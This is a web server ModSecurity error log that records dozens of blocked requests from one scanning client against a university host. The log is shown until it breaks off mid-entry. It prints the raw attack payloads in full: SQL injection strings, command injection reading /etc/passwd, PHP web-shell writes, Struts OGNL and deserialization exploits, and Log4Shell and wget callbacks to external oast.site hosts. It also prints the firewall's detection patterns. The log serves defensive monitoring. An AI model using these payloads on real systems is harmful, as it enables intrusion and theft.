[Tue Aug 29 11:34:44.299679 2023] [:error] [pid 1304] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ipbackend. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ipbackend:  cat/etc/passwd ##"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/app/options.py"] [unique_id "ZO11ZMCo-f0AAAUYm8gAAABN"]
[Tue Aug 29 11:34:49.307187 2023] [:error] [pid 1282] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11acCo-f0AAAUCJdYAAAA6"]
[Tue Aug 29 11:34:49.319563 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22/tic/core/resource/js/erp_data.jsp\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO11acCo-f0AAAUKg-0AAABC"]
[Tue Aug 29 11:34:49.325167 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:league_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:league_id: 1' AND (SELECT 1909 FROM (SELECT(SLEEP(6)))ZiBf)-- qODp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO11acCo-f0AAAT9PO0AAAA1"]
[Tue Aug 29 11:34:49.335539 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filter_tag. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:filter_tag: 1)\\x22 union select * from (select 123)a1 join (select 2)a2 join (select 3)a3 join (select 2)a4 join (select 2)a5  join (select 2)a6 join (select 2)a7 join (select 2)a8 join (select 2)a9 join (select 2)a10 join (select 2)a11 join (select 2)a12 join (select 2)a13 join (select 2)a14 join (select 2)a15 join (select 2)a16 join (select 2)a17 join (select 2)a18 join (select version())a19 join (select md5(999999999))a20 join (select 2)a21 join (select 2)a22 join ..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11acCo-f0AAASEJXUAAAAE"]
[Tue Aug 29 11:34:51.567902 2023] [:error] [pid 1235] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:last_timestamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:last_timestamp: 0) UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562)),NULL,NULL,NULL,NULL,NULL-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11a8Co-f0AAATTmSQAAAAV"]
[Tue Aug 29 11:34:52.319407 2023] [:error] [pid 1254] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:json. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22/ found within ARGS:json: {\\x22url\\x22:\\x22/general/../../mysql5/my.ini\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/ispirit/interface/gateway.php"] [unique_id "ZO11bMCo-f0AAATmZdsAAAAr"]
[Tue Aug 29 11:34:52.342646 2023] [:error] [pid 1234] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO11bMCo-f0AAATSknkAAAAT"]
[Tue Aug 29 11:34:53.309143 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ipAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ipAddress: `/bin/wget http:/cjmn8l5jmimk2adbbnlgrpqd7jyyqewy6.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/Collector/diagnostics/trace_route"] [unique_id "ZO11bcCo-f0AAARjjW8AAAAL"]
[Tue Aug 29 11:34:53.317620 2023] [:error] [pid 1354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:template_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:template_id: 1 and sleep(6)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11bcCo-f0AAAVK0GwAAAAB"]
[Tue Aug 29 11:34:53.359296 2023] [:error] [pid 1166] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/compliancepolicies.inc.php"] [unique_id "ZO11bcCo-f0AAASOUpQAAAAR"]
[Tue Aug 29 11:34:55.345774 2023] [:error] [pid 1253] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:rlist[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: @`'`,  found within ARGS:rlist[]: @`'`, extractvalue(1, concat_ws(0x20, 0x5c,(select md5(999999999)))),@`'`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/comment/api/index.php"] [unique_id "ZO11b8Co-f0AAATlLFMAAAAq"]
[Tue Aug 29 11:34:56.308786 2023] [:error] [pid 1297] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22,\\x22<? found within ARGS:content: <?php file_put_contents(\\x222Udxlb4qUcCcHIzUrBC9eAPkNPN.php\\x22,\\x22<?php echo phpinfo();\\x22);"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11cMCo-f0AAAUR84QAAABI"]
[Tue Aug 29 11:34:56.343078 2023] [:error] [pid 1299] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{}} found within ARGS:cmd: {\\x22/expandocolumn/add-column\\x22:{}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/api/jsonws/invoke"] [unique_id "ZO11cMCo-f0AAAUTiYIAAABJ"]
[Tue Aug 29 11:34:56.345150 2023] [:error] [pid 1289] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '='' found within ARGS:email: '=''or'@email.com"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/login.php"] [unique_id "ZO11cMCo-f0AAAUJIysAAABB"]
[Tue Aug 29 11:34:57.316487 2023] [:error] [pid 1270] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:table_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:table_id: ' AND (SELECT 1 FROM (SELECT(SLEEP(6)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/dashboard/view-chair-list.php"] [unique_id "ZO11ccCo-f0AAAT2JQ0AAAAz"]
[Tue Aug 29 11:34:57.322331 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{}} found within ARGS:cmd: {\\x22/expandocolumn/add-column\\x22:{}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/api/jsonws/invoke"] [unique_id "ZO11ccCo-f0AAASHh88AAAAD"]
[Tue Aug 29 11:34:57.345417 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pid: 0 echo start cat/etc/passwd echo end "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/linuxki/experimental/vis/kivis.php"] [unique_id "ZO11ccCo-f0AAAQKOwQAAAAs"]
[Tue Aug 29 11:34:58.307584 2023] [:error] [pid 1299] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:lang: ../../thinkphp/base"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO11csCo-f0AAAUTiYUAAABJ"]
[Tue Aug 29 11:34:59.305636 2023] [:error] [pid 1253] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:lang: ../../../../../vendor/topthink/think-trace/src/TraceDebug"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO11c8Co-f0AAATlLFkAAAAq"]
[Tue Aug 29 11:35:01.299850 2023] [:error] [pid 1247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:id: %{(#instancemanager=#application[\\x22org.apache.tomcat.InstanceManager\\x22]).(#stack=#attr[\\x22com.opensymphony.xwork2.util.ValueStack.ValueStack\\x22]).(#bean=#instancemanager.newInstance(\\x22org.apache.commons.collections.BeanMap\\x22)).(#bean.setBean(#stack)).(#context=#bean.get(\\x22context\\x22)).(#bean.setBean(#context)).(#macc=#bean.get(\\x22memberAccess\\x22)).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance(\\x22java.util.HashSet\\x22)).(#bean.put(\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO11dcCo-f0AAATfd4YAAAAk"]
[Tue Aug 29 11:35:02.304973 2023] [:error] [pid 1360] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:blowf. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:blowf: system('echo CVE-2022-1609 | rev');"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-json/am-member/license"] [unique_id "ZO11dsCo-f0AAAVQYx0AAAAI"]
[Tue Aug 29 11:35:02.338494 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:user[searchprefs]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :\\x22\\x00*\\x00 found within ARGS:user[searchprefs]: a:2:{i:0;O:27:\\x22googlelogin_vendor_autoload\\x22:0:{}i:1;O:32:\\x22Monolog\\x5cHandler\\x5cSyslogUdpHandler\\x22:1:{s:9:\\x22\\x00*\\x00socket\\x22;O:29:\\x22Monolog\\x5cHandler\\x5cBufferHandler\\x22:7:{s:10:\\x22\\x00*\\x00handler\\x22;r:4;s:13:\\x22\\x00*\\x00bufferSize\\x22;i:-1;s:9:\\x22\\x00*\\x00buffer\\x22;a:1:{i:0;a:2:{i:0;s:14:\\x22CVE-2023-25135\\x22;s:5:\\x22level\\x22;N;}}s:8:\\x22\\x00*\\x00level\\x22;N;s:14:\\x22\\x00*\\x00initialized\\x22;b:1;s:14:\\x22\\x00*\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/ajax/api/user/save"] [unique_id "ZO11dsCo-f0AAAUbg1cAAABQ"]
[Tue Aug 29 11:35:03.320926 2023] [:error] [pid 1354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_dlg[captcha][target]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c')\\x5c found within ARGS:_dlg[captcha][target]: system(\\x5c'ver\\x5c')\\x5c"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/webmail/basic/"] [unique_id "ZO11d8Co-f0AAAVK0HkAAAAB"]
[Tue Aug 29 11:35:03.338909 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:CSRF-TOKEN. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:CSRF-TOKEN: rnqvt{{shell_exec(cat/etc/passwd)}}to5gw"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO11d8Co-f0AAAT9PPgAAAA1"]
[Tue Aug 29 11:35:03.340762 2023] [:error] [pid 1283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:name: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cat /etc/passwd').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO11d8Co-f0AAAUDQT4AAAA7"]
[Tue Aug 29 11:35:04.312442 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:url: ${jndi:ldap://${:-490}${:-620}.${hostName}.url.cjmn8l5jmimk2adbbnlgw45h94t8yhnq4.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/api/geojson"] [unique_id "ZO11eMCo-f0AAATWYSIAAAAa"]
[Tue Aug 29 11:35:04.335869 2023] [:error] [pid 1282] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:order_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:order_id: 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11eMCo-f0AAAUCJesAAAA6"]
[Tue Aug 29 11:35:05.303215 2023] [:error] [pid 1167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:error: ${jndi:ldap://${:-641}${:-850}.${hostName}.uri.cjmn8l5jmimk2adbbnlg8fena7pwd6y11.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/dr/authentication/oauth2/oauth2login"] [unique_id "ZO11ecCo-f0AAASPDNUAAAAS"]
[Tue Aug 29 11:35:06.349210 2023] [:error] [pid 1297] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgzrjc55ccto5nx.oast.site# found within TX:1: cjmn8l5jmimk2adbbnlgzrjc55ccto5nx.oast.site#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/zimlet/com_zimbra_webex/httpPost.jsp"] [unique_id "ZO11esCo-f0AAAUR840AAABI"]
[Tue Aug 29 11:35:07.319164 2023] [:error] [pid 1281] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:time. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:time: 1)) UNION SELECT sleep(6) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11e8Co-f0AAAUB024AAAA5"]
[Tue Aug 29 11:35:07.339826 2023] [:error] [pid 1361] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'sWZA'='sWZA found within ARGS:id: aman' AND (SELECT 2844 FROM (SELECT(SLEEP(6)))FDTM) AND 'sWZA'='sWZA"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag 